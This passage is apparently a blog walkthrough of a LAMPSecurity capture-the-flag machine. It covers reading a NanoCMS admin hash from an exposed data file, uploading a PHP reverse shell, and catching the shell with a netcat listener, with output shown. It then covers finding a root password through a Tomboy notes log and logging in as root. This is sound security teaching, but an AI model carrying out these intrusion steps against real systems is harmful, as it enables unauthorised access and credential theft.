The blog page also has an admin login page and another Squirrel Mail page:
The contact form allows you to send a message to the staff, and there is another app that acts as an event manager:
Also, on port 901 there is a Samba SWAT server protected by basic authentication. This server provides a web-based interface for configuring Samba.
Exploiting the CMS
I made an account on the event manager, but that doesn’t seem to help me much besides creating new blog posts. Next I tested to see if there might be any SQLi in the contact form, but no luck there either. And despite the path traversal error, I wasn’t able to navigate to any arbitrary files on the system.
It turns out I had actually overlooked an important information. On Andy Carp’s blog, we can see the site is powered by NanoCMS. I noticed it but I didn’t give it any thought. When I finally thought to click on it and learn more, it took me to a domain-for-sale page, so I figured it might be some simulated CMS created for this challenge only. Good that I thought to google it and see how wrong I was :p NanoCMS is a lightweight CMS based on PHP that is now discontinued. However, I found a super useful NanoCMS security review that made possible the compromising of the target ;)
Among the vulnerabilities present in the CMS, there is one that allows unrestricted access to the /data/pagesdata.txt. This file contains the username and password hash of the administrator:
I cracked the hash with my favorite online cracker and found out the password is shannon. Next, I logged in to the admin panel:
Now we have the ability to add new pages with our own PHP code. I used pentestmonkey’s reverse PHP shell. I changed the IP and port, and set up a netcat listener to catch the reverse connection. Then I clicked on the newly created page on the blog and looked to my netcat for the goodies:
12345678910
nc -vvnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.155] from (UNKNOWN) [192.168.80.154] 43028
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
11:02:41 up 3:30, 0 users, load average: 0.24, 0.05, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$ whoami
apache
Time for some enumeration! Looking in the home directory, I noticed quite a few user folders:
123456
sh-3.2$ ls
amy
andy
jennifer
loren
patrick
I looked inside them with ls -al. The content was very similar among them and I could find nothing interesting in the files I was allowed to read. Until patrick’s directory, that contained more hidden files than the others:
sh-3.2$ ls -al patrick
total 344
drwxrwxr-x 25 patrick patrick 4096 Dec 5 2012 .
drwxr-xr-x 7 root root 4096 Apr 28 2009 ..
-rw------- 1 patrick patrick 0 Dec 5 2012 .ICEauthority
drwx------ 2 patrick patrick 4096 Apr 28 2009 .Trash
-rw------- 1 patrick patrick 530 Dec 5 2012 .bash_history
-rw-r--r-- 1 patrick patrick 33 Aug 31 2007 .bash_logout
-rw-r--r-- 1 patrick patrick 176 Aug 31 2007 .bash_profile
-rw-r--r-- 1 patrick patrick 124 Aug 31 2007 .bashrc
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 .config
-rw-r--r-- 1 patrick patrick 28 Apr 29 2009 .dmrc
drwxrwxr-x 8 patrick patrick 4096 Apr 29 2009 .evolution
drwx------ 5 patrick patrick 4096 Dec 5 2012 .gconf
drwx------ 2 patrick patrick 4096 Dec 5 2012 .gconfd
drwxrwxr-x 3 patrick patrick 4096 Apr 28 2009 .gnome
drwxr-xr-x 7 patrick patrick 4096 Dec 5 2012 .gnome2
drwx------ 2 patrick patrick 4096 Apr 28 2009 .gnome2_private
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 .gstreamer-0.10
-rw-rw-r-- 1 patrick patrick 146 Dec 5 2012 .gtk-bookmarks
-rw-r--r-- 1 patrick patrick 89 Apr 28 2009 .gtkrc-1.2-gnome2
drwxr-xr-x 3 patrick patrick 4096 Apr 28 2009 .local
-rw-rw-r-- 1 patrick patrick 18 Apr 29 2009 .mailboxlist
drwx------ 3 patrick patrick 4096 Apr 28 2009 .metacity
drwx------ 3 patrick patrick 4096 Apr 28 2009 .mozilla
-rw------- 1 patrick patrick 37 Apr 29 2009 .mysql_history
drwxr-xr-x 3 patrick patrick 4096 Dec 5 2012 .nautilus
-rw-rw-r-- 1 patrick patrick 773 Dec 5 2012 .recently-used.xbel
drwxrwxr-x 4 patrick patrick 4096 Dec 5 2012 .tomboy
-rw-r--r-- 1 patrick patrick 5128 Dec 5 2012 .tomboy.log
drwxr-xr-x 2 patrick patrick 4096 Dec 5 2012 .wapi
-rw-r--r-- 1 patrick patrick 847 Dec 5 2012 .xsession-errors
-rw-r--r-- 1 patrick patrick 658 Oct 11 2007 .zshrc
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Desktop
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Documents
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Download
-rw------- 1 patrick patrick 509 Apr 29 2009 Drafts
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Music
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Pictures
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Public
-rw------- 1 patrick patrick 4329 Apr 29 2009 Sent
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Templates
-rw------- 1 patrick patrick 1243 Apr 29 2009 Trash
drwxr-xr-x 2 patrick patrick 4096 Apr 28 2009 Videos
-rwxrw---- 1 patrick patrick 0 Apr 29 2009 test.txt
I couldn’t read the .mysql_history or test.txt files, but the next one I tried, the .tomboy.log file, was really interesting! I only show the interesting bits here:
1234567891011
sh-3.2$ cat .tomboy.log
...
12/5/2012 7:24:34 AM [DEBUG]: Creating Buffer for 'New Note 3'...
12/5/2012 7:24:34 AM [DEBUG]: New Note 3 tags:
12/5/2012 7:24:38 AM [DEBUG]: Saving 'New Note 3'...
12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:27:41 AM [DEBUG]: Received request for saving session
12/5/2012 7:27:41 AM [DEBUG]: Saving unsaved notes...
12/5/2012 7:27:41 AM [DEBUG]: All done. Ciao!
Tomboy is a note-taking application and it looks like the root password was saved in a note?! I went to the .tomboy directory and found some notes:
1234567
sh-3.2$ ls
481bca0d-7206-45dd-a459-a72ea1131329.note
addin-db-000
addins
ae9cfc26-64e8-4f6f-a8b4-0296e8173504.note
d2684fad-3aab-444c-b90a-4f307c0818f6.note
manifest.xml
Now all that is left is to become root! I SSH’ed with the root credentials and the machine is mine now!
Concluding remarks
This was another cool challenge in the LAMPSecurity series! The exploitation was possible because of the vulnerable CMS that not only disclosed credentials, but also allowed an attacker to execute code on the target. Although the foothold gained was under an unprivileged user, certain files of the home directories were readable when they shouldn’t have been, and the root password was sitting in an unprotected file for anyone to read. A good example of how a chain of misconfigurations can lead to total compromise of a machine.
123456789
/ It's lucky you're going so slowly, \
| because you're going in the wrong |
\ direction. /
------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||